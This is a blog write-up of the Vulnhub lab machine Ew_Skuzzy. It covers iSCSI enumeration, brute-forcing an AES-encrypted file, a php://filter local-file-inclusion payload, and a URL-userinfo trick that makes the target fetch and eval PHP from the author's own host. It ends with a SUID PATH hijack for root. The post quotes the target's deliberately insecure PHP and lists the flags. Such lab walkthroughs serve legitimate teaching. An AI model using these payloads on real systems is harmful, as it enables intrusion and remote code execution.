Thursday 13 April 2017

Vulnhub 1: Ew_Skuzzy

Standard

Me and few of my friends were asked to test some vulnerable environment that will be used as a playground for students, it was a lot of fun and motivated me to do some vulnhub.com in free time.

That's my first write-up on the vulnhub machines, let me know if the description is good enough.

1. Reconnaissance

Running the machine gives us the IP of our target 192.168.1.111

Let's see what basic nmap scan can show us:
→ nmap -T4 -sV 192.168.1.111

Starting Nmap 7.01 ( https://nmap.org ) at 2017-04-13 10:50 CEST
Nmap scan report for skuzzy (192.168.1.111)
Host is up (0.0011s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.19 seconds

2. First flag

We can see 3 open ports, I've started from the last one. I have to admit that I've never used iscsi before, but after a bit of googling, I've successfully connected to and mounted the shares.
→ sudo iscsiadm -m discovery -t st -p 192.168.1.111
192.168.1.111:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

→ sudo iscsiadm -m node --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.111,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.1.111,3260] successful.

→ cd /media/e0ca44be-b1ed-403a-84bd-db5558d6bb7e
→ ls
bobsdisk.dsk  flag1.txt  lost+found

→ cat flag1.txt
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

3. Second flag

That was pretty straight forward, there was no vulnerability to exploit, as was the second flag, we can see that our mounted share contains bobdisk.dsk, we can mount that as well.

→ sudo mount bobsdisk.dsk /media/bobsdisk
→ cd /media/bobsdisk
→ ls -la
total 21
drwxr-xr-x   3 root root  1024 mar 14 10:56 .
drwxr-x---+ 10 root root  4096 kwi 13 11:04 ..
drwx------   2 root root 12288 lut 28 09:56 lost+found
-rw-r--r--   1 root root   288 lut 28 10:25 ToAlice.csv.enc
-rw-r--r--   1 root root  2517 mar 14 10:56 ToAlice.eml

ToAlice.eml
G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly. My favourite new Spanish swear came in handy when this happened... supercalifragilisticoespialidoso !

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. The key is, well, one awesome word I learnt in my recent Spanish classes!

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) :)

Cheers,

Bob.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

4. Third flag

We got the second flag! And some tips how to decrypt the ToAlice.csv.enc, that can be found in the same directory. Keywords are:

  • symmetric keys from here on out
 self explanatory

  • what the letters in its other name stand for
 AES has two names, AES and Rijndael

  •  it won some big important competition among crypto geeks in October 2000
 Rijndael did won a NIST comp in 2000

  • updated version that won the competition.
 AES has been updated in 2001

  • 256 bit Lego kit
 AES-256

  • ROCKYOU
 Maybe we should use /usr/share/wordlists/rockyou.txt from Kali Linux?

  • those blocks chain togeather really does make them work
 AES-256-CBC

  • supercalifragilisticoespialidoso
 the password?

  • -md sha256
 Used digest (-md is the openssl flag)


So we should try AES-256-CBC with SHA256 digest and password supercalifragilisticoespialidoso or rockyou.txt wordlist. I've put supercalifragilisticoespialidoso at the begginning of the rockyou.txt and run the command:

→ /tmp/bruteforce-salted-openssl/bruteforce-salted-openssl -t 4 -f ~/wordlist/rockyou.txt -c aes-256-cbc -d sha256 ToAlice.csv.enc
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

Tried passwords: 1
Tried passwords per second: inf
Last tried password: iloveyou
Password candidate: supercalifragilisticoespialidoso
Tried passwords: 3475548
Tried passwords per second: 1737774,000000
Last tried password: supercalidosa
Password candidate: supercalifragilisticoespialidoso
Let's try that password:
→ openssl aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ~/vulnhub/ew_skuzzy/ToAlice.csv
enter aes-256-cbc decryption password:

→ cd ~/vulnhub/ew_skuzzy
→ cat ToAlice.csv
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

4. Fourth flag

It worked! We got 3 flags so far, and even more hints for the next steps.

http://192.168.1.111/5560a1468022758dba5e92ac8f2353c0/ 
It does not look interesting in any way, we got some base64ed reference to Seinfield TV series, transcript of the dialog: https://www.youtube.com/watch?v=lgC7z_vR78U


http://192.168.1.111/c2444910794e037ebd8aaf257178c90b/?p=welcome
This one is a lot more interesting, we got a GET parameter, my first guess was LFI, it was correct.
http://192.168.1.111/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
After decoding the base64, we get:

<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>

Which gives us the 4th flag.

5. Fifth flag

Next step seems to be Feed Reader tab, it allows to read and execute any php from remote host.

http://192.168.1.111/c2444910794e037ebd8aaf257178c90b/?p=reader
Load Feed -> http://192.168.1.111/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt

We extract the code with LFI once again:

<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
    $url = $_GET['url'];
} else {
    print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

    // Setup some variables.
    $secretok = false;
    $keyneeded = true;

    // Localhost as a source doesn't need to use the key.
    if(preg_match("#^http://127.0.0.1#", $url)) {
        $keyneeded = false;
        $secretok = true;
    }

    // Handle the key validation when it's needed.
    if($keyneeded) {
        $key = $_GET['key'];
        if(is_array($key)) {
            die("Array trick is mitigated ;)");
        }
        if(isset($key) && strlen($key) == '47') {
     $hashedkey = hash('sha256', $key);
            $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

            // If you can use the following code for a timing attack
            // then good luck :) But.. You have the source anyway, right? :) 
     if(strcmp($hashedkey, $secret) == 0) {
                $secretok = true;
            } else {
                die("Sorry... Authentication failed. Key was invalid.");
     }

        } else {
            die("Authentication invalid. You might need a key.");
        }
    }

    // Just to make sure the above key check was passed.
    if(!$secretok) {
        die("Something went wrong with the authentication process");
    }

    // Now load the contents of the file we are reading, and parse
    // the super awesomeness of its contents!
    $f = file_get_contents($url);

    $text = preg_split("/##text##/s", $f);

    if(isset($text['1']) && strlen($text['1']) > 0) {
        print($text['1']);
    }

    print "<br /><br />";

    $php = preg_split("/##php##/s", $f);

    if(isset($php['1']) && strlen($php['1']) > 0) { 
        eval($php['1']);
        // "If Eval is the answer, you're asking the wrong question!" - SG
        // It hurts me to write insecure code like this, but it is in the
        // name of education, and FUN, so I'll let it slide this time.
    }
}
?>

We can see from the code that we need some sort of a key of length 47, which is not bruteforcable. I felt a bit stuck over here. I found another way in. My thought process was, how do you trick the regex that the host is http://127.0.0.1, but the real host is different, I tried:
http://192.168.1.111/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1:asd@192.168.1.115:8000/costam.txt

Where 192.168.1.115:8000 was my server which serves costam.txt, we use 127.0.0.1 as username and asd as password, but because the server does not require you to login, it's ignored. That allows us to bypass the key check and load any file from our site we want(later on it turned out that previous flag was the key, which makes me think that this bug was ?not intended?).
costam.txt - bind shell
Now we got low privs shell, we probably need to escalate for the fifth flag.
After looking around, we can find not standard SUID binary at /opt/alicebackup

As we can see from strings, somewhere inside scp /tmp/special bob@alice.home:~ is used, scp does not have specified full path which means that linux will search for the scp in the PATH variable. We can make our own scp, that will be executed instead of the standard one, directory with our binary must be before the directory with real scp.



After doing so, we are root. We can find the flag inside the /root/flag.txt
I really like the difficulty curve of the challenges, it started really simple and was getting harder and harder with each of the challenges, that keeps people motivated to carry on, which is a good thing!
It was a lot of fun and I look forward to doing next parts.

1 comment:

  1. Great write up, been looking through the walkthrough's to find a better tool to decrypt the AES file (even though the password is in the text) bruteforce-salted-openssl is the best by FAR! thank you

    ReplyDelete